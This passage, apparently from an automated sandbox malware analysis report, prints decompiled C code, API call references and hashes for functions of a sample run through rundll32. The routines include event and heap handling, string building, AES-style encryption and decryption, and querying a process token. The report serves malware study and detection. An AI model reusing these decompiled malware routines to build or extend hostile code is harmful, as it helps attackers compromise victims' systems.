						_v4 = 1;
					}
				}
				return _v4;
			}






                    0x04216160
                    0x04216164
                    0x04216179
                    0x0421617d
                    0x04216180
                    0x04216186
                    0x0421618a
                    0x0421618d
                    0x04216198
                    0x0421618f
                    0x0421618f
                    0x0421618f
                    0x0421618d
                    0x042161a6

                    APIs
                    • memset.NTDLL ref: 04216164
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04216179
                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04216186
                    • CloseHandle.KERNEL32(?), ref: 04216198
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CreateEvent$CloseHandlememset
                    • String ID:
                    • API String ID: 2812548120-0
                    • Opcode ID: a4cbe4330a992cc6f87578c42fb179eb55012477a22cb860c4b62da0b8fd33b0
                    • Instruction ID: c30a3a9fe9b54d7b9e2fc126ceabfce6a18ee87350d24b8d324c7c82235ac3ec
                    • Opcode Fuzzy Hash: a4cbe4330a992cc6f87578c42fb179eb55012477a22cb860c4b62da0b8fd33b0
                    • Instruction Fuzzy Hash: 7BF03AF021430C6FD2109F26EC8492BBBACFB55298B11492DB04682211DA36B815CA70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421137B Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0421137B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x421a30c; // 0x2ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x421a358; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x421a30c; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x421a2d8; // 0x46a0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                    0x0421137b
                    0x04211382
                    0x042113cc
                    0x042113ce
                    0x042113ce
                    0x04211386
                    0x0421138c
                    0x04211391
                    0x04211395
                    0x0421139b
                    0x042113a2
                    0x00000000
                    0x00000000
                    0x042113a4
                    0x042113a9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x042113a9
                    0x042113ab
                    0x042113b3
                    0x042113b6
                    0x042113b6
                    0x042113bc
                    0x042113c3
                    0x042113c6
                    0x042113c6
                    0x00000000

                    APIs
                    • SetEvent.KERNEL32(000002EC,00000001,042110AA), ref: 04211386
                    • SleepEx.KERNEL32(00000064,00000001), ref: 04211395
                    • CloseHandle.KERNEL32(000002EC), ref: 042113B6
                    • HeapDestroy.KERNEL32(046A0000), ref: 042113C6
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CloseDestroyEventHandleHeapSleep
                    • String ID:
                    • API String ID: 4109453060-0
                    • Opcode ID: 36058b38555bd77a4ae01c2cb3f3e2e7623157d325df39c1afe6fed203062d82
                    • Instruction ID: adc803cb03557512b5b6b53a09e6d17fee049b2f9f7970eb67b0224b71661f6f
                    • Opcode Fuzzy Hash: 36058b38555bd77a4ae01c2cb3f3e2e7623157d325df39c1afe6fed203062d82
                    • Instruction Fuzzy Hash: 00F01C75B123129BD720AA3DF84CB67BBE8EB28761B040514BD40D36A9DE38ED90D960
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04215231 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04215231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E04215406(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E042115E6(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E04215B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x421a2d8, 0, _t23);
				}
				return _t20;
			}









                    0x04215231
                    0x04215242
                    0x04215246
                    0x0421529f
                    0x04215248
                    0x0421524f
                    0x04215255
                    0x0421525e
                    0x04215262
                    0x04215268
                    0x04215278
                    0x0421528a
                    0x0421528a
                    0x04215295
                    0x04215295
                    0x042152a6

                    APIs
                      • Part of subcall function 04215406: lstrlen.KERNEL32(?,00000000,04A99D58,00000000,04213C77,04A99F7B,69B25F44,?,?,?,?,69B25F44,00000005,0421A00C,4D283A53,?), ref: 0421540D
                      • Part of subcall function 04215406: mbstowcs.NTDLL ref: 04215436
                      • Part of subcall function 04215406: memset.NTDLL ref: 04215448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04A993CC), ref: 04215268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04A993CC), ref: 04215295
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: 6140d6b65322d4fe10718e3749a4903b9e0b5b567ac22f3a0947f04d4b49955f
                    • Instruction ID: fb6b349751d0704994db5192c89ae548a38b67c149bcdfca8fb93e9fe9dd9ba9
                    • Opcode Fuzzy Hash: 6140d6b65322d4fe10718e3749a4903b9e0b5b567ac22f3a0947f04d4b49955f
                    • Instruction Fuzzy Hash: AA01A232310209BBEB115F98DC48F9A7BB9FF94344F104025FA0096170EBB1E9A4D760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421395B Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E0421395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E042163FD(_t2);
				if(_t34 != 0) {
					_t30 = E042163FD(_t28);
					if(_t30 == 0) {
						E042117AB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0421799A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0421799A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                    0x0421395b
                    0x04213965
                    0x04213967
                    0x0421396d
                    0x0421396d
                    0x04213976
                    0x0421397a
                    0x04213986
                    0x0421398a
                    0x042139fe
                    0x0421398c
                    0x0421398c
                    0x04213990
                    0x04213997
                    0x0421399a
                    0x042139b4
                    0x042139a3
                    0x042139a3
                    0x042139a7
                    0x042139aa
                    0x042139af
                    0x042139af
                    0x042139b9
                    0x042139e1
                    0x042139e7
                    0x042139ea
                    0x042139bb
                    0x042139bd
                    0x042139c5
                    0x042139d0
                    0x042139d5
                    0x042139d5
                    0x042139f1
                    0x042139f8
                    0x042139f9
                    0x042139f9
                    0x0421398a
                    0x04213a09

                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,042143F7,?,?,?,?,00000102,04211AE3,?,?,00000000), ref: 04213967
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                      • Part of subcall function 0421799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04213995,00000000,00000001,00000001,?,?,042143F7,?,?,?,?,00000102), ref: 042179A8
                      • Part of subcall function 0421799A: StrChrA.SHLWAPI(?,0000003F,?,?,042143F7,?,?,?,?,00000102,04211AE3,?,?,00000000,00000000), ref: 042179B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,042143F7,?,?,?,?,00000102,04211AE3,?), ref: 042139C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 042139D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 042139E1
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: cbc670c4a8594aa75dc3fdde3e657d6a01adef7fbbe3d6a07a9ba036a99005fd
                    • Instruction ID: 026ffa852570e8c93f1a6e2566dac5e6c5c6c1ba4e7835acd59e06feb6632cba
                    • Opcode Fuzzy Hash: cbc670c4a8594aa75dc3fdde3e657d6a01adef7fbbe3d6a07a9ba036a99005fd
                    • Instruction Fuzzy Hash: 5321C072710255ABEB129F68C848AAEBFF9DF65284F044050FC059B221D635EA44C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421114D Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0421114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E042163FD(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                    0x04211162
                    0x04211166
                    0x04211170
                    0x04211177
                    0x0421117a
                    0x0421117c
                    0x04211184
                    0x04211189
                    0x04211197
                    0x0421119c
                    0x042111a6

                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04A993CC,?,04213418,004F0053,04A993CC,?,?,?,?,?,?,042154F9), ref: 0421115D
                    • lstrlenW.KERNEL32(04213418,?,04213418,004F0053,04A993CC,?,?,?,?,?,?,042154F9), ref: 04211164
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04213418,004F0053,04A993CC,?,?,?,?,?,?,042154F9), ref: 04211184
                    • memcpy.NTDLL(74E069A0,04213418,00000002,00000000,004F0053,74E069A0,?,?,04213418,004F0053,04A993CC), ref: 04211197
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 52adbf8d124eaea7f4ef3e96b531bb8b2aae99c56b440bafe588fd8ddea2d197
                    • Instruction ID: 01590d2e99a282c2de9718a3c96da6cf5debf6e5ab66a1f674c0ea532ea13960
                    • Opcode Fuzzy Hash: 52adbf8d124eaea7f4ef3e96b531bb8b2aae99c56b440bafe588fd8ddea2d197
                    • Instruction Fuzzy Hash: 3BF04F72A00118FBDF11DFA8CC88C9E7BECEF18298B014062F908D7111E631EA148BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421252A Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(04A99B50,00000000,00000000,7691C740,04216AE6,00000000), ref: 0421253A
                    • lstrlen.KERNEL32(?), ref: 04212542
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • lstrcpy.KERNEL32(00000000,04A99B50), ref: 04212556
                    • lstrcat.KERNEL32(00000000,?), ref: 04212561
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: ae458d9afe6b594bd7668851cf556456197ab51dc86d3a7b62b5b074bf5b7ea5
                    • Instruction ID: cd196a006a8515a9e526343adef0575822edc8bd91476c04e143ef6a24f6d925
                    • Opcode Fuzzy Hash: ae458d9afe6b594bd7668851cf556456197ab51dc86d3a7b62b5b074bf5b7ea5
                    • Instruction Fuzzy Hash: AAE0ED73601661AB87119AE8AC5CCAFFBADEFA96517080456FA0193120DB299D05CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Function 04444872 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 4444872-44448b2 CryptAcquireContextW 136 44448b8-44448f4 memcpy CryptImportKey 135->136 137 4444a09-4444a0f GetLastError 135->137 139 44449f4-44449fa GetLastError 136->139 140 44448fa-444490c CryptSetKeyParam 136->140 138 4444a12-4444a19 137->138 141 44449fd-4444a07 CryptReleaseContext 139->141 142 44449e0-44449e6 GetLastError 140->142 143 4444912-444491b 140->143 141->138 144 44449e9-44449f2 CryptDestroyKey 142->144 145 4444923-4444930 call 44463fd 143->145 146 444491d-444491f 143->146 144->141 150 4444936-444493f 145->150 151 44449d7-44449de 145->151 146->145 147 4444921 146->147 147->145 152 4444942-444494a 150->152 151->144 153 444494c 152->153 154 444494f-444496c memcpy 152->154 153->154 155 4444987-4444996 CryptDecrypt 154->155 156 444496e-4444985 CryptEncrypt 154->156 157 444499c-444499e 155->157 156->157 158 44449a0-44449aa 157->158 159 44449ae-44449b9 GetLastError 157->159 158->152 160 44449ac 158->160 161 44449cd-44449d5 call 44417ab 159->161 162 44449bb-44449cb 159->162 160->162 161->144 162->144
                    C-Code - Quality: 58%
                    			E04444872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x444a0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x444a0c4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E044463FD(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x444a0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E044417AB(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                    0x0444487b
                    0x04444881
                    0x04444884
                    0x0444488a
                    0x0444488a
                    0x0444488c
                    0x0444488e
                    0x04444891
                    0x04444897
                    0x04444898
                    0x04444899
                    0x0444489f
                    0x044448a4
                    0x044448aa
                    0x044448b2
                    0x04444a0f
                    0x044448b8
                    0x044448ba
                    0x044448c3
                    0x044448c8
                    0x044448da
                    0x044448dd
                    0x044448e1
                    0x044448e8
                    0x044448ec
                    0x044448f4
                    0x044449fa
                    0x044448fa
                    0x044448fa
                    0x044448fe
                    0x044448ff
                    0x04444901
                    0x0444490c
                    0x044449e6
                    0x04444912
                    0x04444912
                    0x04444915
                    0x0444491b
                    0x04444921
                    0x04444921
                    0x04444929
                    0x0444492d
                    0x04444930
                    0x044449d7
                    0x04444936
                    0x0444493c
                    0x0444493f
                    0x04444942
                    0x04444944
                    0x04444947
                    0x0444494a
                    0x0444494c
                    0x0444494c
                    0x04444956
                    0x0444495b
                    0x0444495e
                    0x04444961
                    0x04444963
                    0x0444496c
                    0x04444996
                    0x0444496e
                    0x0444497f
                    0x0444497f
                    0x0444499e
                    0x00000000
                    0x00000000
                    0x044449a0
                    0x044449a3
                    0x044449a6
                    0x044449aa
                    0x00000000
                    0x044449ac
                    0x044449bb
                    0x044449c1
                    0x044449c9
                    0x044449c9
                    0x00000000
                    0x044449aa
                    0x044449ae
                    0x044449b6
                    0x044449b9
                    0x044449d0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x044449b9
                    0x04444930
                    0x044449e9
                    0x044449ec
                    0x044449ec
                    0x04444a01
                    0x04444a01
                    0x04444a19

                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04443AC6), ref: 044448AA
                    • memcpy.NTDLL(?,04443AC6,00000010,?,?,?,?,?,?,?,?,?,?,044460F5,00000000,04444DD9), ref: 044448C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 044448EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04444904
                    • memcpy.NTDLL(00000000,04444DD9,04443AC6,0000011F), ref: 04444956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04443AC6,00000020,?,?,0000011F), ref: 0444497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04443AC6,?,?,0000011F), ref: 04444996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 044449AE
                    • GetLastError.KERNEL32 ref: 044449E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 044449EC
                    • GetLastError.KERNEL32 ref: 044449F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04444A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,044460F5,00000000,04444DD9,04443AC6,?,04443AC6), ref: 04444A09
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: f2afa4c22846992512ed3ba87a630ef2eb96038284c6757c539685ccd52191bb
                    • Instruction ID: 4d0eb4988d3c5b55abee3debef4419fcd2251f160b2b3c0dbecfd69768a0b799
                    • Opcode Fuzzy Hash: f2afa4c22846992512ed3ba87a630ef2eb96038284c6757c539685ccd52191bb
                    • Instruction Fuzzy Hash: 03513E75900208BFFF20DFB5D884AAFBBB8EB84354F00442AF915E6240D775AE54EB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044477BB Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E044477BB(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E044463FD(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E044417AB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                    0x044477c8
                    0x044477c9
                    0x044477ca
                    0x044477cb
                    0x044477cc
                    0x044477d0
                    0x044477d7
                    0x044477e6
                    0x044477e9
                    0x044477ec
                    0x044477f3
                    0x044477f6
                    0x044477f9
                    0x044477fc
                    0x044477ff
                    0x0444780a
                    0x0444780c
                    0x04447815
                    0x0444781d
                    0x0444781f
                    0x04447831
                    0x0444783b
                    0x0444783f
                    0x0444784e
                    0x04447852
                    0x0444785b
                    0x04447863
                    0x04447863
                    0x04447865
                    0x04447865
                    0x0444786d
                    0x04447873
                    0x04447877
                    0x04447877
                    0x04447882

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04447802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04447815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04447831
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0444784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 0444785B
                    • NtClose.NTDLL(?), ref: 0444786D
                    • NtClose.NTDLL(00000000), ref: 04447877
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: 91ec9b9774f70308da5cd8108b4aaecbb6a1214b50b4ecc4f45fa18e38cf8607
                    • Instruction ID: ef852521841354b41aad781251f6626acd60958a71843f3f8ab0b26a7c2434c1
                    • Opcode Fuzzy Hash: 91ec9b9774f70308da5cd8108b4aaecbb6a1214b50b4ecc4f45fa18e38cf8607
                    • Instruction Fuzzy Hash: 752116B6900218BBEF019FA6CC84ADEBFBDEF88750F104066F905A6110D7719A45DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044468EB Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E044468EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
